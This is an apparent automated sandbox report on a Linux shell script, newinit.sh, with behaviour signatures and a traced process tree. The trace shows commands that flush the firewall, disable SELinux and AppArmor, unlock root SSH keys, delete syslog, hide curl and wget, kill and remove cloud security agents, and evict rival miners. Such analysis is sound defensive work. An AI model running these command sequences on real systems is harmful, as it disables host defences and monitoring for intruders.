520e22713960b96051de3d666c4ca1ebe01a9f34ea2281c646474b514a1aab1f

Analysis

max time kernel
150s
platform
debian-9_mips
resource
debian9-mipsbe-20240611-en
resource tags

arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
08-12-2024 20:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

newinit.sh
Size

46KB
MD5

d85918fc8a4f927f91d5914a149eabc4
SHA1

51e8581f114a18b9e98b0a860a03220f8209eea8
SHA256

520e22713960b96051de3d666c4ca1ebe01a9f34ea2281c646474b514a1aab1f
SHA512

5f57e8b30a0dd9920c5ae80b55421c9177a015ea1be329c5bd155d93aa41a6dcf73793f95e6ff2ce67a503ea32713fbeaf0be59b8c7924ac19248a4549d1aa69
SSDEEP

768:bxlT2wDuWvWi7XFNcuFkc2zq0x3UKnicZuiR/a6X85:8qF+Lc2/FicfS6X85

Score

7^/10

defense_evasion discovery persistence

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 2 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
699	chmod
703	chmod

Flushes firewall rules 1 TTPs 1 IoCs

Flushes/ disables firewall rules inside the Linux kernel.

defense_evasion

Disable or Modify System Firewall

T1562.004

pid	Process
709	iptables

Attempts to change immutable files 64 IoCs

Modifies inode attributes on the filesystem to allow changing of immutable files.

pid	Process
1192	xargs
759	grep
831	xargs
997	xargs
1053	xargs
1174	xargs
715	chattr
898	chattr
1387	xargs
1407	xargs
1341	xargs
1506	xargs
841	xargs
894	chattr
901	chattr
1205	xargs
1324	xargs
717	chattr
856	xargs
1461	xargs
786	xargs
974	xargs
1280	xargs
1352	xargs
1412	xargs
1402	xargs
982	xargs
1036	xargs
1217	xargs
1306	xargs
1319	xargs
1011	xargs
1397	xargs
1486	xargs
1169	xargs
1186	xargs
1262	xargs
705	chattr
889	chattr
926	xargs
1069	xargs
1129	xargs
1466	xargs
721	chattr
1211	xargs
1347	xargs
1417	xargs
945	xargs
1058	xargs
1084	xargs
1119	xargs
1231	xargs
1255	xargs
1449	xargs
1491	xargs
836	xargs
920	xargs
1104	xargs
1357	xargs
1382	xargs
851	xargs
952	xargs
1094	xargs
1250	xargs

Disables AppArmor 16 IoCs

Disables AppArmor security module.

pid	Process
776	systemctl
761	systemctl
769	systemctl
769	systemctl
769	systemctl
769	systemctl
761	systemctl
768	systemctl
772	systemctl
761	systemctl
761	systemctl
761	systemctl
769	systemctl
761	systemctl
774	systemctl
769	systemctl

Disables SELinux 1 TTPs 9 IoCs

Disables SELinux security module.

defense_evasion

Disable or Modify Tools

T1562.001

pid	Process
1064	kill
1064	kill
1064	kill
1064	kill
760	setenforce
1064	kill
1229	grep
1360	grep
1064	kill

Enumerates running processes
Discovers information about currently running processes on the system

Write file to user bin folder 6 IoCs

persistence

description	ioc	Process
File opened for modification	/usr/bin/ip6network	newinit.sh
File opened for modification	/usr/bin/kswaped	newinit.sh
File opened for modification	/usr/bin/irqbalanced	newinit.sh
File opened for modification	/usr/bin/rctlcli	newinit.sh
File opened for modification	/usr/bin/systemd-network	newinit.sh
File opened for modification	/usr/bin/pamdicks	newinit.sh

Reads CPU attributes 1 TTPs 64 IoCs

discovery

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	sysctl
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps

Enumerates kernel/hardware configuration 1 TTPs 8 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

discovery

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl

Process Discovery 1 TTPs 64 IoCs

Adversaries may try to discover information about running processes.

discovery

Process Discovery

T1057

pid	Process
1413	ps
1150	ps
1188	ps
1315	ps
1075	ps
1239	ps
1353	ps
1182	ps
1110	ps
1232	ps
1251	ps
1487	ps
1502	ps
1120	ps
1388	ps
1032	ps
1043	ps
1100	ps
1115	ps
1130	ps
1330	ps
1343	ps
795	ps
827	ps
1155	ps
1160	ps
1165	ps
1220	ps
1302	ps
1325	ps
1492	ps
1482	ps
782	ps
1125	ps
1140	ps
1308	ps
1467	ps
1439	ps
803	ps
1085	ps
1170	ps
1348	ps
1444	ps
1472	ps
832	ps
1265	ps
1269	ps
1283	ps
847	ps
852	ps
1070	ps
1295	ps
1434	ps
1477	ps
1194	ps
1363	ps
811	ps
1049	ps
1456	ps
837	ps
1145	ps
1423	ps
1497	ps
1201	ps

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/167/stat	ps
File opened for reading	/proc/23/cmdline	ps
File opened for reading	/proc/150/stat	ps
File opened for reading	/proc/333/cmdline	ps
File opened for reading	/proc/self/fd	xargs
File opened for reading	/proc/24/cmdline	ps
File opened for reading	/proc/uptime	ps
File opened for reading	/proc/389/status	ps
File opened for reading	/proc/167/stat	ps
File opened for reading	/proc/1456/stat	ps
File opened for reading	/proc/330/cmdline	ps
File opened for reading	/proc/1398/status	ps
File opened for reading	/proc/1342/stat	ps
File opened for reading	/proc/77/cmdline	ps
File opened for reading	/proc/235/cmdline	ps
File opened for reading	/proc/376/stat	ps
File opened for reading	/proc/78/status	ps
File opened for reading	/proc/1/cmdline	ps
File opened for reading	/proc/1/status	ps
File opened for reading	/proc/456/status	ps
File opened for reading	/proc/4/stat	ps
File opened for reading	/proc/698/status	ps
File opened for reading	/proc/16/status	ps
File opened for reading	/proc/13/cmdline	ps
File opened for reading	/proc/115/stat	ps
File opened for reading	/proc/13/stat	ps
File opened for reading	/proc/1367/status	ps
File opened for reading	/proc/stat	ps
File opened for reading	/proc/83/stat	ps
File opened for reading	/proc/17/stat	ps
File opened for reading	/proc/333/status	ps
File opened for reading	/proc/697/cmdline	ps
File opened for reading	/proc/954/status	ps
File opened for reading	/proc/1/stat	ps
File opened for reading	/proc/70/status	ps
File opened for reading	/proc/691/cmdline	ps
File opened for reading	/proc/21/cmdline	ps
File opened for reading	/proc/21/cmdline	ps
File opened for reading	/proc/695/cmdline	ps
File opened for reading	/proc/1337/status	ps
File opened for reading	/proc/self/maps	awk
File opened for reading	/proc/24/status	ps
File opened for reading	/proc/77/stat	ps
File opened for reading	/proc/21/status	ps
File opened for reading	/proc/15/status	ps
File opened for reading	/proc/700/cmdline	ps
File opened for reading	/proc/37/stat	ps
File opened for reading	/proc/19/status	ps
File opened for reading	/proc/376/status	ps
File opened for reading	/proc/456/cmdline	ps
File opened for reading	/proc/71/stat	ps
File opened for reading	/proc/tty/drivers	ps
File opened for reading	/proc/sys/kernel/osrelease	ps
File opened for reading	/proc/78/stat	ps
File opened for reading	/proc/12/status	ps
File opened for reading	/proc/73/status	ps
File opened for reading	/proc/140/stat	ps
File opened for reading	/proc/17/stat	ps
File opened for reading	/proc/1342/status	ps
File opened for reading	/proc/492/stat	ps
File opened for reading	/proc/6/cmdline	ps
File opened for reading	/proc/19/status	ps
File opened for reading	/proc/77/cmdline	ps
File opened for reading	/proc/15/cmdline	ps

System Network Configuration Discovery 1 TTPs 5 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
1222	grep
1260	grep
1489	grep
888	chattr
897	chattr

Writes file to tmp directory 1 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/dev/null	newinit.sh

/tmp/newinit.sh
/tmp/newinit.sh
1⤵
- Write file to user bin folder
- Writes file to tmp directory
PID:698
- /bin/chmod
  chmod 777 /usr/bin/chattr
  2⤵
  - File and Directory Permissions Modification
  PID:699
- /bin/chmod
  chmod 777 /bin/chattr
  2⤵
  - File and Directory Permissions Modification
  PID:703
- /usr/bin/chattr
  chattr -iua /tmp/
  2⤵
  - Attempts to change immutable files
  PID:705
- /usr/bin/chattr
  chattr -iua /var/tmp/
  2⤵
  PID:707
- /sbin/iptables
  iptables -F
  2⤵
  - Flushes firewall rules
  PID:709
- /usr/bin/chattr
  chattr -iae /root/.ssh/
  2⤵
  - Attempts to change immutable files
  PID:715
- /usr/bin/chattr
  chattr -iae /root/.ssh/authorized_keys
  2⤵
  - Attempts to change immutable files
  PID:717
- /usr/bin/chattr
  chattr -iua /tmp/
  2⤵
  PID:719
- /usr/bin/chattr
  chattr -iua /var/tmp/
  2⤵
  - Attempts to change immutable files
  PID:721
- /bin/rm
  rm -rf "/tmp/addres*"
  2⤵
  PID:723
- /bin/rm
  rm -rf "/tmp/walle*"
  2⤵
  PID:725
- /bin/rm
  rm -rf /tmp/keys
  2⤵
  PID:727
- /bin/rm
  rm -rf /var/log/syslog
  2⤵
  PID:729
- /bin/sync
  sync
  2⤵
  PID:731
- /bin/cat
  cat /var/spool/cron/
  2⤵
  PID:734
- /bin/cat
  cat /root/.ssh/authorized_keys
  2⤵
  PID:735
- /bin/mv
  mv /usr/bin/wgettnt /usr/bin/wd1
  2⤵
  PID:736
- /bin/mv
  mv /usr/bin/curltnt /usr/bin/cd1
  2⤵
  PID:738
- /bin/mv
  mv /usr/bin/wget1 /usr/bin/wd1
  2⤵
  PID:740
- /bin/mv
  mv /usr/bin/curl1 /usr/bin/cd1
  2⤵
  PID:741
- /bin/mv
  mv /usr/bin/cur /usr/bin/cd1
  2⤵
  PID:743
- /bin/mv
  mv /usr/bin/cdl /usr/bin/cd1
  2⤵
  PID:745
- /bin/mv
  mv /usr/bin/cdt /usr/bin/cd1
  2⤵
  PID:747
- /bin/mv
  mv /usr/bin/xget /usr/bin/wd1
  2⤵
  PID:748
- /bin/mv
  mv /usr/bin/wge /usr/bin/wd1
  2⤵
  PID:750
- /bin/mv
  mv /usr/bin/wdl /usr/bin/wd1
  2⤵
  PID:751
- /bin/mv
  mv /usr/bin/wdt /usr/bin/wd1
  2⤵
  PID:752
- /bin/mv
  mv /usr/bin/wget /usr/bin/wd1
  2⤵
  PID:753
- /bin/mv
  mv /usr/bin/curl /usr/bin/cd1
  2⤵
  PID:755
- /bin/ps
  ps aux
  2⤵
  PID:756
- /bin/grep
  grep -i "[a]liyun"
  2⤵
  PID:757
- /bin/grep
  grep -i "[y]unjing"
  2⤵
  - Attempts to change immutable files
  PID:759
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:758
- /usr/sbin/setenforce
  setenforce 0
  2⤵
  - Disables SELinux
  PID:760
- /usr/sbin/service
  service apparmor stop
  2⤵
  PID:761
- - /usr/bin/basename
    basename /usr/sbin/service
    3⤵
    PID:762
- - /usr/bin/basename
    basename /usr/sbin/service
    3⤵
    PID:763
- - /bin/systemctl
    systemctl --quiet is-active multi-user.target
    3⤵
    - Enumerates kernel/hardware configuration
    PID:764
- - /bin/systemctl
    systemctl list-unit-files --full "--type=socket"
    3⤵
    - Enumerates kernel/hardware configuration
    PID:766
- - /bin/sed
    sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"
    3⤵
    PID:767
- /usr/local/sbin/systemctl
  systemctl "--job-mode=ignore-dependencies" stop apparmor.service
  2⤵
  - Disables AppArmor
  PID:761
- /usr/local/bin/systemctl
  systemctl "--job-mode=ignore-dependencies" stop apparmor.service
  2⤵
  - Disables AppArmor
  PID:761
- /usr/sbin/systemctl
  systemctl "--job-mode=ignore-dependencies" stop apparmor.service
  2⤵
  - Disables AppArmor
  PID:761
- /usr/bin/systemctl
  systemctl "--job-mode=ignore-dependencies" stop apparmor.service
  2⤵
  - Disables AppArmor
  PID:761
- /sbin/systemctl
  systemctl "--job-mode=ignore-dependencies" stop apparmor.service
  2⤵
  - Disables AppArmor
  PID:761
- /bin/systemctl
  systemctl "--job-mode=ignore-dependencies" stop apparmor.service
  2⤵
  - Disables AppArmor
  - Enumerates kernel/hardware configuration
  PID:761
- /bin/systemctl
  systemctl disable apparmor
  2⤵
  - Disables AppArmor
  - Enumerates kernel/hardware configuration
  PID:768
- /usr/sbin/service
  service aliyun.service stop
  2⤵
  PID:769
- - /usr/bin/basename
    basename /usr/sbin/service
    3⤵
    PID:770
- - /usr/bin/basename
    basename /usr/sbin/service
    3⤵
    PID:771
- - /bin/systemctl
    systemctl --quiet is-active multi-user.target
    3⤵
    - Disables AppArmor
    - Enumerates kernel/hardware configuration
    PID:772
- - /bin/systemctl
    systemctl list-unit-files --full "--type=socket"
    3⤵
    - Disables AppArmor
    - Enumerates kernel/hardware configuration
    PID:774
- - /bin/sed
    sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"
    3⤵
    PID:775
- /usr/local/sbin/systemctl
  systemctl "--job-mode=ignore-dependencies" stop aliyun.service.service
  2⤵
  - Disables AppArmor
  PID:769
- /usr/local/bin/systemctl
  systemctl "--job-mode=ignore-dependencies" stop aliyun.service.service
  2⤵
  - Disables AppArmor
  PID:769
- /usr/sbin/systemctl
  systemctl "--job-mode=ignore-dependencies" stop aliyun.service.service
  2⤵
  - Disables AppArmor
  PID:769
- /usr/bin/systemctl
  systemctl "--job-mode=ignore-dependencies" stop aliyun.service.service
  2⤵
  - Disables AppArmor
  PID:769
- /sbin/systemctl
  systemctl "--job-mode=ignore-dependencies" stop aliyun.service.service
  2⤵
  - Disables AppArmor
  PID:769
- /bin/systemctl
  systemctl "--job-mode=ignore-dependencies" stop aliyun.service.service
  2⤵
  - Disables AppArmor
  - Enumerates kernel/hardware configuration
  PID:769
- /bin/systemctl
  systemctl disable aliyun.service
  2⤵
  - Disables AppArmor
  - Enumerates kernel/hardware configuration
  PID:776
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:777
- /bin/grep
  grep -v grep
  2⤵
  PID:778
- /bin/grep
  grep aegis
  2⤵
  PID:779
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:780
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:781
- /bin/grep
  grep Yun
  2⤵
  PID:784
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:785
- /bin/grep
  grep -v grep
  2⤵
  PID:783
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:786
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:782
- /usr/bin/awk
  awk "{print \$11}"
  2⤵
  PID:790
- /bin/grep
  grep aegis
  2⤵
  PID:789
- /bin/grep
  grep -v grep
  2⤵
  PID:788
- /usr/bin/xargs
  xargs dirname
  2⤵
  PID:791
- - /usr/local/sbin/dirname
    dirname
    3⤵
    PID:793
- - /usr/local/bin/dirname
    dirname
    3⤵
    PID:793
- - /usr/sbin/dirname
    dirname
    3⤵
    PID:793
- - /usr/bin/dirname
    dirname
    3⤵
    PID:793
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:787
- /usr/bin/xargs
  xargs rm -rf
  2⤵
  PID:792
- - /usr/local/sbin/rm
    rm -rf
    3⤵
    PID:794
- - /usr/local/bin/rm
    rm -rf
    3⤵
    PID:794
- - /usr/sbin/rm
    rm -rf
    3⤵
    PID:794
- - /usr/bin/rm
    rm -rf
    3⤵
    PID:794
- - /sbin/rm
    rm -rf
    3⤵
    PID:794
- - /bin/rm
    rm -rf
    3⤵
    PID:794
- /usr/bin/awk
  awk "{print \$11}"
  2⤵
  PID:798
- /bin/grep
  grep hids
  2⤵
  PID:797
- /bin/grep
  grep -v grep
  2⤵
  PID:796
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:795
- /usr/bin/xargs
  xargs dirname
  2⤵
  PID:799
- - /usr/local/sbin/dirname
    dirname
    3⤵
    PID:801
- - /usr/local/bin/dirname
    dirname
    3⤵
    PID:801
- - /usr/sbin/dirname
    dirname
    3⤵
    PID:801
- - /usr/bin/dirname
    dirname
    3⤵
    PID:801
- /usr/bin/xargs
  xargs rm -rf
  2⤵
  PID:800
- - /usr/local/sbin/rm
    rm -rf
    3⤵
    PID:802
- - /usr/local/bin/rm
    rm -rf
    3⤵
    PID:802
- - /usr/sbin/rm
    rm -rf
    3⤵
    PID:802
- - /usr/bin/rm
    rm -rf
    3⤵
    PID:802
- - /sbin/rm
    rm -rf
    3⤵
    PID:802
- - /bin/rm
    rm -rf
    3⤵
    PID:802
- /bin/grep
  grep cloudwalker
  2⤵
  PID:805
- /usr/bin/awk
  awk "{print \$11}"
  2⤵
  PID:806
- /bin/grep
  grep -v grep
  2⤵
  PID:804
- /usr/bin/xargs
  xargs dirname
  2⤵
  PID:807
- - /usr/local/sbin/dirname
    dirname
    3⤵
    PID:809
- - /usr/local/bin/dirname
    dirname
    3⤵
    PID:809
- - /usr/sbin/dirname
    dirname
    3⤵
    PID:809
- - /usr/bin/dirname
    dirname
    3⤵
    PID:809
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:803
- /usr/bin/xargs
  xargs rm -rf
  2⤵
  PID:808
- - /usr/local/sbin/rm
    rm -rf
    3⤵
    PID:810
- - /usr/local/bin/rm
    rm -rf
    3⤵
    PID:810
- - /usr/sbin/rm
    rm -rf
    3⤵
    PID:810
- - /usr/bin/rm
    rm -rf
    3⤵
    PID:810
- - /sbin/rm
    rm -rf
    3⤵
    PID:810
- - /bin/rm
    rm -rf
    3⤵
    PID:810
- /bin/grep
  grep titanagent
  2⤵
  PID:813
- /usr/bin/awk
  awk "{print \$11}"
  2⤵
  PID:814
- /bin/grep
  grep -v grep
  2⤵
  PID:812
- /usr/bin/xargs
  xargs dirname
  2⤵
  PID:815
- - /usr/local/sbin/dirname
    dirname
    3⤵
    PID:820
- - /usr/local/bin/dirname
    dirname
    3⤵
    PID:820
- - /usr/sbin/dirname
    dirname
    3⤵
    PID:820
- - /usr/bin/dirname
    dirname
    3⤵
    PID:820
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:811
- /usr/bin/xargs
  xargs rm -rf
  2⤵
  PID:816
- - /usr/local/sbin/rm
    rm -rf
    3⤵
    PID:821
- - /usr/local/bin/rm
    rm -rf
    3⤵
    PID:821
- - /usr/sbin/rm
    rm -rf
    3⤵
    PID:821
- - /usr/bin/rm
    rm -rf
    3⤵
    PID:821
- - /sbin/rm
    rm -rf
    3⤵
    PID:821
- - /bin/rm
    rm -rf
    3⤵
    PID:821
- /bin/grep
  grep edr
  2⤵
  PID:824
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:825
- /bin/grep
  grep -v grep
  2⤵
  PID:823
- /usr/bin/xargs
  xargs -I "{}" kill -9 "{}"
  2⤵
  PID:826
- /bin/ps
  ps aux
  2⤵
  PID:822
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:830
- /bin/grep
  grep aegis
  2⤵
  PID:829
- /bin/grep
  grep -v grep
  2⤵
  PID:828
- /usr/bin/xargs
  xargs -I "{}" kill -9 "{}"
  2⤵
  - Attempts to change immutable files
  PID:831
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:827
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:832
- /bin/grep
  grep -v grep
  2⤵
  PID:833
- /bin/grep
  grep Yun
  2⤵
  PID:834
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:835
- /usr/bin/xargs
  xargs -I "{}" kill -9 "{}"
  2⤵
  - Attempts to change immutable files
  PID:836
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:840
- /bin/grep
  grep hids
  2⤵
  PID:839
- /bin/grep
  grep -v grep
  2⤵
  PID:838
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:837
- /usr/bin/xargs
  xargs -I "{}" kill -9 "{}"
  2⤵
  - Attempts to change immutable files
  PID:841
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:845
- /bin/grep
  grep edr
  2⤵
  PID:844
- /bin/grep
  grep -v grep
  2⤵
  PID:843
- /usr/bin/xargs
  xargs -I "{}" kill -9 "{}"
  2⤵
  PID:846
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:842
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:850
- /bin/grep
  grep cloudwalker
  2⤵
  PID:849
- /bin/grep
  grep -v grep
  2⤵
  PID:848
- /usr/bin/xargs
  xargs -I "{}" kill -9 "{}"
  2⤵
  - Attempts to change immutable files
  PID:851
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:847
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:855
- /bin/grep
  grep titanagent
  2⤵
  PID:854
- /bin/grep
  grep -v grep
  2⤵
  PID:853
- /usr/bin/xargs
  xargs -I "{}" kill -9 "{}"
  2⤵
  - Attempts to change immutable files
  PID:856
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:852
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:860
- /bin/grep
  grep sgagent
  2⤵
  PID:859
- /bin/grep
  grep -v grep
  2⤵
  PID:858
- /usr/bin/xargs
  xargs -I "{}" kill -9 "{}"
  2⤵
  PID:861
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:857
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:867
- /bin/grep
  grep barad_agent
  2⤵
  PID:866
- /bin/grep
  grep -v grep
  2⤵
  PID:865
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:864
- /usr/bin/xargs
  xargs -I "{}" kill -9 "{}"
  2⤵
  PID:868
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:873
- /bin/grep
  grep hostguard
  2⤵
  PID:872
- /usr/bin/xargs
  xargs -I "{}" kill -9 "{}"
  2⤵
  PID:874
- /bin/grep
  grep -v grep
  2⤵
  PID:871
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:870
- /bin/rm
  rm -rf /usr/local/aegis
  2⤵
  PID:876
- /bin/sleep
  sleep 1
  2⤵
  PID:878
- /usr/bin/chattr
  chattr -i /usr/bin/ip6network
  2⤵
  - System Network Configuration Discovery
  PID:888
- /usr/bin/chattr
  chattr -i /usr/bin/kswaped
  2⤵
  - Attempts to change immutable files
  PID:889
- /usr/bin/chattr
  chattr -i /usr/bin/irqbalanced
  2⤵
  PID:890
- /usr/bin/chattr
  chattr -i /usr/bin/rctlcli
  2⤵
  PID:892
- /usr/bin/chattr
  chattr -i /usr/bin/systemd-network
  2⤵
  - Attempts to change immutable files
  PID:894
- /usr/bin/chattr
  chattr -i /usr/bin/pamdicks
  2⤵
  PID:895
- /usr/bin/chattr
  chattr +i /usr/bin/ip6network
  2⤵
  - System Network Configuration Discovery
  PID:897
- /usr/bin/chattr
  chattr +i /usr/bin/kswaped
  2⤵
  - Attempts to change immutable files
  PID:898
- /usr/bin/chattr
  chattr +i /usr/bin/irqbalanced
  2⤵
  PID:900
- /usr/bin/chattr
  chattr +i /usr/bin/rctlcli
  2⤵
  - Attempts to change immutable files
  PID:901
- /usr/bin/chattr
  chattr +i /usr/bin/systemd-network
  2⤵
  PID:902
- /usr/bin/chattr
  chattr +i /usr/bin/pamdicks
  2⤵
  PID:903
- /bin/sleep
  sleep 1
  2⤵
  PID:905
- /bin/rm
  rm -f /tmp/.null
  2⤵
  PID:912
- /sbin/sysctl
  sysctl -w "vm.nr_hugepages=128"
  2⤵
  - Reads CPU attributes
  PID:914
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:918
- /bin/grep
  grep 194.87.139.103
  2⤵
  PID:917
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:919
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:920
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:924
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:925
- /bin/grep
  grep 185.71.65.238
  2⤵
  PID:923
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:926
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:929
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:930
- /bin/grep
  grep 140.82.52.87
  2⤵
  PID:928
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:931
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:935
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:936
- /bin/grep
  grep :23
  2⤵
  PID:934
- /bin/grep
  grep -v -
  2⤵
  PID:937
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:938
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:943
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:942
- /bin/grep
  grep :143
  2⤵
  PID:941
- /bin/grep
  grep -v -
  2⤵
  PID:944
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:945
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:950
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:949
- /bin/grep
  grep :2222
  2⤵
  PID:948
- /bin/grep
  grep -v -
  2⤵
  PID:951
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:952
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:959
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:958
- /bin/grep
  grep :3333
  2⤵
  PID:957
- /bin/grep
  grep -v -
  2⤵
  PID:960
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:961
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:965
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:964
- /bin/grep
  grep :3389
  2⤵
  PID:963
- /bin/grep
  grep -v -
  2⤵
  PID:966
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:967
